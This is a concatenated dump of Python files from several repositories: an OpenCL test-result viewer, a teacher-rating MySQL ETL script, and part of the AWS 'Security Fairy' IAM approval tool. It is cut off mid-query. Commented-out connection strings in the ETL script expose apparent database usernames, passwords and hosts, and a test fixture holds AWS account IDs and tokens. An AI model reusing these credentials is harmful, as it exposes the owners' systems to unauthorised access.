" Expected line format: RESULTS FOR <prog_name>.cl (<no_lines>) "
if "RESULTS FOR" in line:
program = line.split(" ")[2]
if program not in contents:
contents[program] = dict()
contents[program][platform] = []
if program not in line_nos:
if "(" not in line:
continue
line_nos[program] = line.split("(")[1].split(")")[0]
else:
contents[program][platform].append(line)
raw_contents.clear()
" Parse numeric values to uniformly have 0x in the beginning "
print("Making data uniform...")
for program in contents:
for platform in contents[program]:
contents[program][platform] = "\n".join(sorted(contents[program][platform]))
if bool(numeric_value.match(contents[program][platform])):
continue
parsed_value = []
for result in contents[program][platform].split(","):
result = result.strip()
if not result:
continue
if not result.startswith("0x"):
parsed_value.append("0x" + result)
else:
parsed_value.append(result)
contents[program][platform] = ",".join(sorted(parsed_value))
" Find majority vote for each program "
print("Computing majorities...")
vote = dict()
sample = dict()
for program in contents:
vote[program] = dict()
for platform in contents[program]:
curr_result = contents[program][platform]
if not curr_result.startswith("0x"):
continue
if curr_result in vote[program]:
vote[program][curr_result] += 1
else:
vote[program][curr_result] = 0
curr_max = 0
curr_cand = []
for candidate, votes in vote[program].items():
if votes > curr_max:
curr_max = votes
curr_cand = [candidate]
elif votes == curr_max:
curr_cand.append(candidate)
if len(curr_cand) != 1 or curr_max < votes_min:
sample[program] = "Inconclusive"
else:
sample[program] = curr_cand[0]
vote.clear
return sample, contents, line_nos
--- FILE SEPARATOR ---
def OutputHTML(prog_list, sample, contents):
print("hi")
--- FILE SEPARATOR ---
#!/usr/bin/python
from loadresults import ParseData
import filterresults
import outputresults
import os
import subprocess
from kivy.app import App
from kivy.config import Config
from kivy.uix.widget import Widget
from kivy.uix.button import Button
from kivy.uix.dropdown import DropDown
from kivy.uix.carousel import Carousel
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.label import Label
from kivy.uix.textinput import TextInput
from kivy.properties import ObjectProperty
from kivy.uix.screenmanager import ScreenManager, Screen
height = "533"
width = "1000"
class Browser(Screen):
dir_box = ObjectProperty(None)
file_chooser = ObjectProperty(None)
def SelectDir(self):
if not self.file_chooser.selection:
self.dir_box.text = self.file_chooser.path
elif self.file_chooser.selection and self.file_chooser.selection[0] != "../":
self.dir_box.text = self.file_chooser.selection[0]
def ChooseDir(self):
analyzer_instance = Analyzer(name="analyzer")
self.manager.add_widget(analyzer_instance)
self.manager.current = "analyzer"
self.manager.current_screen.Initialize(self.dir_box.text)
class Analyzer(Screen):
plat_btn = ObjectProperty(None)
filter_btn = ObjectProperty(None)
prog_ipt = ObjectProperty(None)
result_view = ObjectProperty(None)
sample = dict()
contents = dict()
line_nos = dict()
curr_idx = 0
prog_list = []
plat_list = []
res_ipt = ObjectProperty(None)
res_dff = ObjectProperty(None)
res_cmp = ObjectProperty(None)
res_plt = ""
res_slt = ObjectProperty(None)
cnt_lbl = ObjectProperty(None)
def Initialize(self, path):
self.sample, self.contents, self.line_nos = ParseData(path)
platforms = DropDown()
for platform in sorted(self.contents.itervalues().next().keys()):
btn = Button(text = platform, size_hint_y = None, height = 33)
btn.bind(on_release = lambda btn: self.SetPlatform(btn.text, platforms))
platforms.add_widget(btn)
self.plat_list.append(platform)
self.plat_btn.bind(on_release = platforms.open)
platforms.bind(on_select = lambda instance, x: setattr(self.plat_btn, 'text', x))
test_filter = DropDown()
for filter_type in ["None", "Matching", "MatchingPlat", "Matching+NoRes", "MatchingPlat+NoRes"]:
btn = Button(text = filter_type, size_hint_y = None, height = 33)
btn.bind(on_release = lambda btn: self.SetFilter(btn.text, test_filter))
test_filter.add_widget(btn)
self.filter_btn.bind(on_release = test_filter.open)
test_filter.bind(on_select = lambda instance, x: setattr(self.filter_btn, 'text', x))
def SetPlatform(self, platform, dropdown):
dropdown.select(platform)
self.prog_list = self.FilterProgs(self.filter_btn.text)
if self.res_plt:
self.prog_ipt.text = self.ProgNameAndLines(self.prog_list[0])
self.curr_idx = 0
self.ChangeResults()
elif self.filter_btn.text != "Filter...":
self.prog_ipt.text = self.ProgNameAndLines(self.prog_list[0])
self.SetResults()
self.curr_idx = 0
def SetFilter(self, filter_type, dropdown = None):
if dropdown:
dropdown.select(filter_type)
self.prog_list = self.FilterProgs(filter_type)
if self.res_plt:
self.prog_ipt.text = self.ProgNameAndLines(self.prog_list[0])
self.curr_idx = 0
self.ChangeResults()
elif self.plat_btn.text != "Platform...":
self.prog_ipt.text = self.ProgNameAndLines(self.prog_list[0])
self.SetResults()
self.curr_idx = 0
def ProgNameAndLines(self, prog):
return prog + " (" + str(self.line_nos[prog]) + ")"
def GoPrev(self):
if self.plat_btn.text == "Platform..." or self.filter_btn.text == "Filter...":
return
if self.curr_idx == 0:
self.curr_idx = len(self.prog_list) - 1
else:
self.curr_idx -= 1
self.prog_ipt.text = self.ProgNameAndLines(self.prog_list[self.curr_idx])
self.ChangeResults()
def GoNext(self):
if self.plat_btn.text == "Platform..." or self.filter_btn.text == "Filter...":
return
if self.curr_idx == len(self.prog_list) - 1:
self.curr_idx = 0
else:
self.curr_idx += 1
self.prog_ipt.text = self.ProgNameAndLines(self.prog_list[self.curr_idx])
self.ChangeResults()
def GoProg(self, prog):
if not prog.endswith(".cl"):
prog += ".cl"
if not prog in self.prog_list:
self.prog_ipt.text = self.ProgNameAndLines(self.prog_list[self.curr_idx])
else:
self.curr_idx = self.prog_list.index(prog)
self.prog_ipt.text = self.ProgNameAndLines(prog)
self.ChangeResults()
def FilterProgs(self, filter_type):
if filter_type == "None" or self.plat_btn.text == "Platform...":
return sorted(self.sample.keys())
elif filter_type == "Matching" or (filter_type == "MatchingPlat" and self.res_plt in ["Sample", ""]):
return filterresults.FilterMatching(self.sample, self.contents, self.plat_btn.text)
elif filter_type == "MatchingPlat":
return filterresults.FilterPlat(self.contents, self.plat_btn.text, self.res_plt)
elif filter_type == "Matching+NoRes" or (filter_type == "MatchingPlat+NoRes" and self.res_plt in ["Sample", ""]):
return filterresults.FilterMatching(self.sample, self.contents, self.plat_btn.text, True)
elif filter_type == "MatchingPlat+NoRes":
return filterresults.FilterPlat(self.contents, self.plat_btn.text, self.res_plt, True)
def SetResults(self):
plat_select = DropDown()
for platform in ["Sample"] + self.plat_list:
btn = Button(text = platform, size_hint_y = None, height = 33)
btn.bind(on_release = lambda btn: plat_select.select(btn.text))
plat_select.add_widget(btn)
plat_select_btn = Button(text = "Sample")
plat_select_btn.bind(on_release = plat_select.open)
plat_select.bind(on_select = lambda instance, x: self.ChangeResults(x))
btn_layout = BoxLayout(orientation = "horizontal", size_hint_y = None, height = 33)
lbl_compare = Label(markup = True, size_hint_x = 0.10)
lbl_compare.text = self.GetComparison(self.plat_btn.text, plat_select_btn.text)
diff_ipt = TextInput(text = self.sample[self.prog_list[self.curr_idx]], readonly = True)
res_ipt = TextInput(text = self.contents[self.prog_list[self.curr_idx]][self.plat_btn.text], readonly = True)
btn_layout_bot = BoxLayout(orientation = "horizontal", size_hint_y = None, height = 33)
cnt_lbl = Label(text = str(self.curr_idx + 1) + " / " + str(len(self.prog_list)), size_hint_x = 0.5)
gen_btn = Button(text = "Output HTML", size_hint_x = 0.25)
gen_btn.bind(on_release = lambda btn: outputresults.OutputHTML(self.plat_list, self.prog_list, self.sample, self.contents))
back_btn = Button(text = "Back", size_hint_x = 0.25)
back_btn.bind(on_release = lambda btn: self.SwitchScreen())
btn_layout_bot.add_widget(cnt_lbl)
btn_layout_bot.add_widget(gen_btn)
btn_layout_bot.add_widget(back_btn)
btn_layout.add_widget(lbl_compare)
btn_layout.add_widget(plat_select_btn)
self.result_view.add_widget(res_ipt)
self.result_view.add_widget(btn_layout)
self.result_view.add_widget(diff_ipt)
self.result_view.add_widget(btn_layout_bot)
self.res_plt = plat_select_btn.text
self.res_ipt = res_ipt
self.res_dff = diff_ipt
self.res_cmp = lbl_compare
self.res_slt = plat_select_btn
self.prog_ipt.readonly = False
self.cnt_lbl = cnt_lbl
def ChangeResults(self, diff_plat = ""):
if diff_plat:
self.res_plt = diff_plat
self.res_slt.text = diff_plat
if self.filter_btn.text == "MatchingPlat":
self.prog_list = self.FilterProgs("MatchingPlat")
self.prog_ipt.text = self.ProgNameAndLines(self.prog_list[0])
self.curr_idx = 0
self.res_cmp.text = self.GetComparison(self.plat_btn.text, self.res_plt)
self.res_ipt.text = self.contents[self.prog_list[self.curr_idx]][self.plat_btn.text]
if self.res_plt == "Sample":
self.res_dff.text = self.sample[self.prog_list[self.curr_idx]]
else:
self.res_dff.text = self.contents[self.prog_list[self.curr_idx]][self.res_slt.text]
self.cnt_lbl.text = str(self.curr_idx + 1) + " / " + str(len(self.prog_list))
def GetComparison(self, curr_plat, diff_plat):
prog_no = self.prog_list[self.curr_idx]
left = self.contents[prog_no][curr_plat]
if diff_plat == "Sample":
right = self.sample[prog_no]
else:
right = self.contents[prog_no][diff_plat]
if left == right:
text = "[color=00ff00]Match[/color]"
else:
text = "[color=ff0000]Diff.[/color]"
return text
def SwitchScreen(self):
to_remove = self.manager.current_screen
self.manager.current = "browser"
self.manager.remove_widget(to_remove)
class ShowResultsApp(App):
def build(self):
Config.set("graphics", "width", width)
Config.set("graphics", "height", height)
browser_instance = Browser(name="browser")
browser_instance.dir_box.text = os.getcwd()
browser_instance.file_chooser.path = os.getcwd()
browser_instance.file_chooser.filters = "os.path.isdir"
sm = ScreenManager()
sm.add_widget(browser_instance)
return sm
if __name__ == "__main__":
ShowResultsApp().run()
|
[
"/filterresults.py",
"/loadresults.py",
"/outputresults.py",
"/showresults.py"
] |
01662024622/teacher_ratting_aggregation
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import math
import os
import time
from datetime import datetime
from sqlalchemy import create_engine, text
from sqlalchemy.orm import sessionmaker
from teacher_rate import TeacherRate
start_time = None
# config_time = int(os.environ["CONFIG_TIME_1578790800"])
config_time = 1578790800
#
delay_time = int(os.environ["DELAY_TIME"])
# delay_time = 1
# int(os.environ["DELAY_TIME"])
db_url_extract = str(os.environ["DB_URL_EXTRACT"])
# db_url_extract = 'mysql://root:1qazXSW@2019@sp1.dev.native.vn:3306/topicalms?charset=utf8&use_unicode=True'
db_url_load = str(os.environ["DB_URL_LOAD"])
# db_url_load = 'mysql://nvn_knowledge:ZKqC7vNK4HgOxnM7@118.70.223.165:3306/nvn_knowledge_v2?charset=utf8&use_unicode=True'
delay_scheduel = int(os.environ["DELAY_SCHEDUEL"])
# delay_scheduel = 6400
# 'SET @row_number := 0; ' + \
sqldata = str(
'SELECT teacher_id, FORMAT(AVG(points), 1) as rate_avg, MAX(num) AS number_rate ' + \
'FROM( SELECT @row_number:= CASE ' + \
'WHEN @customer_no = teacher_id ' + \
'THEN @row_number + 1 ' + \
'ELSE 1 ' + \
'END ' + \
'AS num, ' + \
'@customer_no:= teacher_id teacher_id, ' + \
'timecreated,points ' + \
'FROM mdl_rating_class, ' + \
'(SELECT @customer_no:=0,@row_number:=0) as t ' + \
'WHERE teacher_id > 0 AND vote = 1 and points > 0 ' + \
'ORDER BY teacher_id, id DESC ' + \
') as ali ' + \
'WHERE num < 301 ' + \
'GROUP BY teacher_id ')
def dict2TeacherRate(d):
v = TeacherRate()
for k in d.keys():
setattr(v, k, d[k])
return v
def extractLoad(db_url, list_data, var):
engine = create_engine(db_url, connect_args={'connect_timeout': 150}, echo=True)
conn = engine.connect()
if var == 0:
conn.execute(text('TRUNCATE teacher_rating_300;'))
Session = sessionmaker(bind=conn)
session = Session()
i = 0
time_report = datetime.now()
updated_time = str(time_report)
for line in list_data:
d = dict2TeacherRate(line)
d.updated_time = updated_time
session.add(d)
i += 1
if i > 0:
session.commit()
session.close()
conn.close()
while True:
if start_time is None:
start_time = (int((int(
datetime.now().timestamp()) - 1578790800) / delay_scheduel)) * delay_scheduel + 1578790800 + config_time
else:
if start_time > int(datetime.now().timestamp()):
time.sleep(delay_time)
continue
engine = create_engine(db_url_extract, connect_args={'connect_timeout': 150}, echo=True)
conn = engine.connect()
sql = text(
'SELECT COUNT(DISTINCT teacher_id) FROM mdl_rating_class ra JOIN mdl_tpebbb bb ON ra.room_id = bb.id AND ra.teacher_id>0 and points>0 AND vote=1')
resultCount = conn.execute(sql)
count = resultCount.fetchone()[0]
print("have " + str(count) + " record from extract database")
if count > 100:
for var in list(range(int(math.ceil(count / 1500)))):
sqllimit = text(sqldata + str('LIMIT ') + str(var * 1500) + str(',1500'))
data = conn.execute(sqllimit)
# print(data.keys())
extractLoad(db_url_load, data, var)
start_time += delay_scheduel
--- FILE SEPARATOR ---
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from sqlalchemy import Column, Integer, BigInteger, TIMESTAMP
from sqlalchemy.dialects.mysql import DOUBLE
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class TeacherRate(Base):
__tablename__ = 'teacher_rating_300'
id = Column('id', BigInteger, primary_key=True)
teacher_id = Column('teacher_id', Integer)
rate_avg = Column('rate_avg', DOUBLE)
number_rate = Column('number_rate', Integer)
updated_time = Column('updated_time', TIMESTAMP)
--- FILE SEPARATOR ---
from teacher_rate import TeacherRate
from datetime import datetime
import math
import os
import requests as rq
import ast
from collections import namedtuple
import json
import math
from sqlalchemy import create_engine, text
from sqlalchemy.orm import sessionmaker
import csv
from teacher_rate import TeacherRate
from datetime import datetime
import time
print (str(datetime.now()))
|
[
"/main.py",
"/teacher_rate.py",
"/test.py"
] |
01AT/security-fairy
|
"""
API Approval
Presents the revised policy created by Security Fairy,
and waits for the user to Approve or Cancel the policy
change.
"""
from __future__ import print_function
import string
import json
import boto3
import os
from setup_logger import create_logger
from aws_api_tools import get_domain_from_proxy_api_gateway
from aws_api_tools import api_response
from requests.utils import unquote
from botocore.exceptions import ProfileNotFound
try:
SESSION = boto3.session.Session(profile_name='training',
region_name='us-east-1')
except ProfileNotFound as pnf:
SESSION = boto3.session.Session()
logger = create_logger(name='api_approve.py')
def lambda_handler(event, context):
""" Executed by the Lambda service.
Returns the API website for users who are at the Approve
or Cancel stage of the Security Fairy tool.
"""
method = event['httpMethod']
domain = get_domain_from_proxy_api_gateway(event)
if method == 'GET':# and event['queryStringParameters'] is not None:
logger.debug('GET Method')
return api_website(event, domain)
if method == 'POST':
logger.debug('POST Method')
return token_task(event)
# Default API Response returns an error
return api_response(headers={'Content-Type':'application/json'}, body='Method Unsupported.')
def token_task(event):
"""Return the Step Function token task."""
sfn_client = SESSION.client('stepfunctions')
approved_or_denied = event["pathParameters"].get("approval", "deny")
body = json.loads(event['body'])
task_token = unquote(body['task_token'])
response_string = ''
try:
if 'approve' in approved_or_denied:
logger.info('approved')
response = sfn_client.send_task_success(taskToken=task_token,
output=json.dumps(body))
logger.info(response)
response_string = "New policy applied. You will be redirected shortly."
if 'deny' in approved_or_denied:
response = sfn_client.send_task_failure(taskToken=task_token,
error='User Denial',
cause=json.dumps(body))
response_string = "Revised Policy deleted."
except Exception as e:
logger.info(e)
return api_response(statusCode=200, headers={'Content-Type':'application/json'}, body=response_string)
def api_website(event, domain):
"""Displays a front end website for Approval or Cancel by the user."""
dynamodb_client = SESSION.client('dynamodb')
entity_arn = ''
entity_name = ''
dynamodb_client = SESSION.client('dynamodb')
try:
execution_id = event['queryStringParameters']['execution-id']
logger.debug(execution_id)
response_item = dynamodb_client.get_item( TableName=os.environ['dynamodb_table'],
Key={
"execution_id": {
"S": "{execution_id}".format(execution_id=execution_id)
}
})['Item']
new_policy = response_item['new_policy']['S']
entity_arn = response_item['entity_arn']['S']
entity_name = entity_arn.split('/')[1]
logger.info(response_item)
except Exception as error:
logger.info(error)
new_policy = "Error: This executionId has either expired or is invalid."
body = """
<html>
<body bgcolor=\"#E6E6FA\">
<head>
<!-- Latest compiled and minified CSS -->
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
<style>
.code {
max-height: 500px;
width: 600px;
overflow: scroll;
text-align: left;
margin-bottom: 20px;
}
</style>
<script>
function getUrlParameter(name) {
name = name.replace(/[\[]/, '\\[').replace(/[\]]/, '\\]');
var regex = new RegExp('[\\?&]' + name + '=([^&#]*)');
var results = regex.exec(location.search);
return results === null ? '' : decodeURIComponent(results[1].replace(/\+/g, ' '));
};
var dict = {};
var taskToken = getUrlParameter('task-token');
var executionId = getUrlParameter('execution-id');
dict['task_token']= taskToken;
dict['execution_id']=executionId;
function submitRequest(approval){
$.ajax({
type: 'POST',
headers: {
'Content-Type':'application/json',
'Accept':'text/html'
},
url:'$domain'+approval,
crossDomain: true,
data: JSON.stringify(dict),
dataType: 'text',
success: function(responseData) {
document.getElementById("output").innerHTML = responseData;
},
error: function (responseData) {
alert('POST failed: '+ JSON.stringify(responseData));
}
});
};
function redirect(){
var url = "https://console.aws.amazon.com/iam/home?region=us-east-1#/roles/$entity_name";
document.location.href = url;
};
$(document).ready(function(){
document.getElementById("output").innerHTML = JSON.stringify($new_policy, null, "\\t");
$("#approve").click(function(){
console.log("Approve button clicked");
submitRequest("approve");
setTimeout(redirect,4000);
});
$("#deny").click(function(){
console.log("deny button clicked");
submitRequest("deny");
});
});
</script>
</head>
<body>
<center>
<title>IAM Security Fairy</title>
<h1><span class="glyphicon glyphicon-fire text-danger" ></span> IAM Security Fairy</h1>
<div class="code"><pre>$entity_arn</pre></div>
<div class="code"><pre id='output'></pre></div>
<button class="btn btn-primary" id='approve'>Apply</button>
<button class="btn btn-danger" id='deny'>Cancel</button>
</center>
</body>
</html>"""
replace_dict = dict(new_policy=new_policy, domain=domain, entity_arn=entity_arn, entity_name=entity_name)
return_body = string.Template(body).safe_substitute(replace_dict)
return api_response(statusCode=200, body=return_body)
if __name__ == '__main__':
EVENT = {
u'body': u'{"task_token":"AAAAKgAAAAIAAAAAAAAAAeBS1qBvUAgyOizrFb5NdzMlMlS%2BqIKnNmqXDJlrEXcIrwwRvxrKGV65Rs1ar6zzx0tVhh%2BEzjhn2FKSTpsusDO3S6CUZU3LVfwhOcluxAJDlTPSujG4FYvgQxUI%2FnzChKRAVIIGKZywPPD6VpkBkKp19RuN6Bq6g0Krx2ASzfFbvS7mK%2F%2FMxfyn52MrIXAEy75xYnBSR5wtt4%2BuBUXWIoGsoQ8haKfsB2R3mnxykbDUNmM7TtnWULw4Z9V3LOfhwp0ZxzfzNXWpRMvY4Ifwu6VSHRgoRl%2FzVpcDXr3Eeeb4fLic30B56cWjI5qxpALfswEHyP%2FWPyXkpyAHmQUbxlygRzpZUmt84%2F7Ds%2FXr2GpRcrp7Hzpe2GiMymHgXYp8wgSzRZAV5R1fYaRPgSnGETUs37%2BGC8eIfgC8ER6JuXhy1xv6ugvO3vZ0rNd9FdylHzrQ4CtAM0yMagmEfOfibCQxjAFswIBd1E790dhe1I5eD9X8%2BTMt7CzYdSN0MOky3dn6uhIfNUxU5cs4jGg%2FzfrsEBW2fFmmxQ68phCL3AXgxoGO4LIs2mkLJzM%2BtbMmCA%3D%3D","execution_id":"d285e04c-21d9-4468-93d2-ba7b173c2292"}',
u'resource': u'/{approval}',
u'requestContext': {
u'resourceId': u'ktk3jq',
u'apiId': u'ezwzmmh526',
u'resourcePath': u'/{approval}',
u'httpMethod': u'GET',
u'requestId': u'2938ad50-50a7-11e7-bff1-93579d44e732',
u'path': u'/Prod/approve',
u'accountId': u'281782457076',
u'identity': {
u'apiKey': u'',
u'userArn': None,
u'cognitoAuthenticationType': None,
u'accessKey': None,
u'caller': None,
u'userAgent': u'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
u'user': None,
u'cognitoIdentityPoolId': None,
u'cognitoIdentityId': None,
u'cognitoAuthenticationProvider': None,
u'sourceIp': u'71.219.116.20',
u'accountId': None
},
u'stage': u'Prod'
},
u'queryStringParameters': None,
u'httpMethod': u'GET',
u'pathParameters': {
u'approval': u'deny'
},
u'headers': {
u'origin': u'https://ezwzmmh526.execute-api.us-east-1.amazonaws.com',
u'Via': u'2.0 3c6cd3705576f791e49d58b73a16e8f0.cloudfront.net (CloudFront)',
u'Accept-Language': u'en-US,en;q=0.8',
u'Accept-Encoding': u'gzip, deflate, br',
u'CloudFront-Is-SmartTV-Viewer': u'false',
u'CloudFront-Forwarded-Proto': u'https',
u'X-Forwarded-For': u'71.219.116.20, 216.137.42.62',
u'CloudFront-Viewer-Country': u'US',
u'Accept': u'text/html',
u'User-Agent': u'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
u'X-Amzn-Trace-Id': u'Root=1-59409bf5-31a996a67ad3927c5c312295',
u'dnt': u'1',
u'Host': u'ezwzmmh526.execute-api.us-east-1.amazonaws.com',
u'X-Forwarded-Proto': u'https',
u'Referer': u'https://ezwzmmh526.execute-api.us-east-1.amazonaws.com/Prod/approve?execution-id=9487c326-23fc-46d6-a2c2-69b6342b5162&task-token=AAAAKgAAAAIAAAAAAAAAAbwck0ZXLox0l5UCsjE3iQN3iBJNAu9ZWh%2FElSrNKHdVP90ZxgrPZvFQZMnl%2BdcD4J9VdwieXvx2s6VBpQ1AsIrJLYM7y9D1bDRvrct34LA4YldibA7gw3dz5YmvScrCiLX8DLPT5BiKkpKtwN5pVXqlC0fZcSQ4Z2ZdSvAN%2Fawy6S678p5QyxsJlqe3pQpbIZfmQ4XjboqpLMIWSMDkYajtBuxMgtfyX879s5QHzCZ9d0B29WI3FV0PS07xMYrqn%2B2Nu%2F2l64JvKMMNBknJZiM2c92AQFZMFvOvMCHnxbtLqZjZpWTaW5Z3O0Cv5B91l6T7bZvk6Dp7QZ6fAdYlQw8S%2FYT0Vz6z%2FsMPDf3bxPfGJ9b4cjVHbLX0nK4BEvlAW%2FOEXJGGYG9X2V%2FgUoRMs%2FRwEenzvxi5raZPsHlCqOZzmuszC1H4duNQBaRjF2vzOY60wyOoP7%2FshrdfPvGKh9LMMUi%2Fir2y9W8hbCb6R1MZERE9yOIUlK%2Bc5NHZf64JnRvNG2tUF4efOjVIbZfLrayDEAgLqeOtlXSy7yOLxSjdmqcVKXmD2AdnLg2yi%2FHYyyUc3fQPZES6nPOMpuLz27E%3D',
u'CloudFront-Is-Tablet-Viewer': u'false',
u'X-Forwarded-Port': u'443',
u'X-Amz-Cf-Id': u'ZVhtdhkgqjEmMBhWxew_9Xuq91gaPrxLIowzD0R0eBJgXzXj8Y6rfQ==',
u'CloudFront-Is-Mobile-Viewer': u'false',
u'content-type': u'application/json',
u'CloudFront-Is-Desktop-Viewer': u'true'
},
u'stageVariables': None,
u'path': u'/deny',
u'isBase64Encoded': False
}
logger.info("Lambda Handler:")
logger.info(lambda_handler(EVENT, {}))
--- FILE SEPARATOR ---
"""API Endpoint
Validates inputs to the Security Fairy tool,
then creates and executes the State Machine
which orchestrates the Security Fairy
Lambda functions.
"""
import json
import re
import os
import string
import boto3
from botocore.exceptions import ProfileNotFound
from aws_entity import AWSEntity
try:
SESSION = boto3.session.Session(profile_name='training', region_name='us-east-1')
except ProfileNotFound as pnf:
SESSION = boto3.session.Session()
def lambda_handler(event, context):
"""
Executed by the Lambda service.
Returns the validated inputs and invokes
the State Machine that orchestrates
Security Fairy.
"""
api_return_payload = {
'statusCode': 500,
'headers':{
'Content-Type':'application/json'
},
'body':'Security Fairy Internal Server Error.'
}
domain = get_domain(event)
method = event['httpMethod']
if method == 'GET':
return api_website(event, domain)
if method == 'POST':
return post_response(event, domain)
return api_return_payload
def post_response(event, domain):
api_return_payload = {
'statusCode': 500,
'headers':{
'Content-Type':'application/json'
},
'body':'Security Fairy Internal Server Error.'
}
print(event)
try:
inputs = validate_inputs(event)
invoke_state_machine(inputs)
api_return_payload['statusCode'] = 200
api_return_payload['body'] = 'The auditing process can take up to 20 minutes. An email will be sent upon completion.'
except Exception as error:
print(error)
api_return_payload['statusCode'] = 200
api_return_payload['body'] = "Unsuccessful: {error}".format(error=error)
print api_return_payload
return api_return_payload
def get_domain(event):
# Supports test invocations from API Gateway
if event['headers'] is None:
return "https://testinvocation/start"
# Extracts the domain from event object based on for both api gateway URLs
# or custom domains
if 'amazonaws.com' in event['headers']['Host']:
return "https://{domain}/{stage}{path}".format(domain=event['headers']['Host'],
stage=event['requestContext']['stage'],
path=event['path'])
else:
return "https://{domain}{path}".format(domain=event['headers']['Host'],
path=event['path'])
def invoke_state_machine(inputs):
"""Invoke state machine"""
print json.dumps(inputs)
sfn_client = SESSION.client('stepfunctions')
response = sfn_client.start_execution(stateMachineArn=os.environ['state_machine'],
input=json.dumps(inputs)
)
print(response)
def validate_inputs(event):
"""Validate inputs"""
input_payload = json.loads(event['body'])
num_days = validate_date_window(input_payload.get('num_days', 7))
entity_arn = validate_entity_arn(input_payload.get('entity_arn'))
return {
'num_days' : num_days*-1,
'entity_arn': entity_arn
}
def validate_date_window(days):
"""Validate the date range for the Security Fairy query"""
window = abs(days)
if window > 30 or window < 1:
print window
raise ValueError('Valid number of days is between 1 and 30 inclusive.')
return window
def validate_entity_arn(entity_arn):
"""Validate entity ARN"""
# account_number = SESSION.client('sts').get_caller_identity()["Account"]
# Roles are valid: arn:aws:iam::842337631775:role/1S-Admins
# arn:aws:sts::281782457076:assumed-role/1S-Admins/alex
# Users are invalid: arn:aws:iam::842337631775:user/aaron
try:
arn = AWSEntity(entity_arn)
except Exception:
raise ValueError('Malformed ARN. Please enter a role ARN.')
print(arn.entity_type)
if 'user' in arn.entity_type:
raise ValueError('Users not supported. Please enter a role ARN.')
if 'group' in arn.entity_type:
raise ValueError('Groups not supported. Please enter a role ARN.')
if not arn.is_assumed_role() and not arn.is_role():
raise ValueError('Invalid Resource ARN.')
# pattern = re.compile("arn:aws:(sts|iam)::(\d{12})?:(role|assumed-role)\/(.*)")
# if not pattern.match(entity_arn):
# raise ValueError('Invalid Resource ARN.')
assumed_role_pattern = re.compile("arn:aws:sts::(\d{12})?:assumed-role\/(.*)\/(.*)")
if not assumed_role_pattern.match(entity_arn):
refactored_arn = "arn:aws:sts::" + arn.get_account_number() + ":assumed-role/" + arn.get_entity_name()
entity_arn = refactored_arn
SESSION.client('iam').get_role(RoleName=arn.get_entity_name())
return entity_arn
def invoke_state_machine(inputs):
print(json.dumps(inputs))
response = SESSION.client('stepfunctions').start_execution( stateMachineArn=os.environ['state_machine'],
input=json.dumps(inputs))
print(response)
def api_website(event, domain):
body = """
<html>
<body bgcolor=\"#E6E6FA\">
<head>
<!-- Latest compiled and minified CSS -->
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
<style>
.form {
padding-left: 1cm;
}
.div{
padding-left: 1cm;
}
</style>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.1.1/jquery.min.js"></script>
<script>
$(document).ready(function(){
$("button").click(function(){
var entity_arn = document.getElementById("entity_arn").value;
var dict = {};
dict["entity_arn"] = entity_arn;
if (document.getElementById("num_days").value != "") {
dict["num_days"] = Number(document.getElementById("num_days").value);
}
else{
dict["num_days"] = 30;
};
$.ajax({
type: 'POST',
headers: {
'Content-Type':'application/json',
'Accept':'text/html'
},
url:'$domain',
crossDomain: true,
data: JSON.stringify(dict),
dataType: 'text',
success: function(responseData) {
alert(responseData);
//document.getElementById("id").innerHTML = responseData;
document.getElementById("entity_arn").value="";
document.getElementById("num_days").value="";
},
error: function (responseData) {
//alert(responseData);
alert('POST failed.'+ JSON.stringify(responseData));
}
});
});
});
</script>
</head>
<title>Security Fairy IAM Policy Remediation Tool</title>
<h1 class="div">Security Fairy IAM Remediation Tool</h1>
<body>
<form class="form" action="" method="post">
<textarea rows="1" cols="50" name="text" id="entity_arn" placeholder="arn:aws:iam::0123456789:role/roleName"></textarea>
</form>
<form class="form" action="" method="post">
<textarea rows="1" cols="50" name="text" id="num_days" placeholder="Scan the logs for between 1-30 days (Enter Number)"></textarea>
</form>
<div class="div"><button class="btn btn-primary">Audit Entity</button></div>
<div class="div" id="id"></div>
</body>
</html>
"""
return {
"statusCode": 200,
"headers": {
"Content-Type": 'text/html',
"Access-Control-Allow-Origin": "*"
},
"body": string.Template(body).safe_substitute({"domain": domain})
}
if __name__ == '__main__':
print(validate_entity_arn('arn:aws:sts::842337631775:assumed-role/1S-Admins/potato'))
--- FILE SEPARATOR ---
"""Athena Query
Submits the appropriate Security Fairy
query to Athena.
"""
import re
import boto3
import logging
from datetime import datetime, timedelta
from setup_logger import create_logger
from botocore.exceptions import ProfileNotFound
logger = create_logger(name="athena_query.py", logging_level=logging.INFO)
try:
SESSION = boto3.session.Session(profile_name='training',
region_name='us-east-1')
except ProfileNotFound as pnf:
SESSION = boto3.session.Session()
def lambda_handler(event, context):
""" Executed by the Lambda service.
Submits the query for execution and returns
the Execution ID for use by subsequent
Lambda functions.
"""
event['execution_id'] = execute_query(event['entity_arn'],
event['num_days'],
event['s3_bucket'])
return event
def window_calc(num_days):
"""Calculate the correct year,
month, and day for the query
"""
days = abs(num_days)
delta = timedelta(days=days)
today = datetime.now()
query_date = today - delta
year = query_date.year
month = query_date.month
return year, str(month).zfill(2)
def execute_query(entity_arn, num_days, s3_bucket):
"""Submit and run query"""
escaped_arn = build_escaped_arn(entity_arn)
year, month = window_calc(num_days)
hql = f"""
select useridentity.arn as user_arn
, eventsource
, array_distinct(array_agg(eventName)) as actions
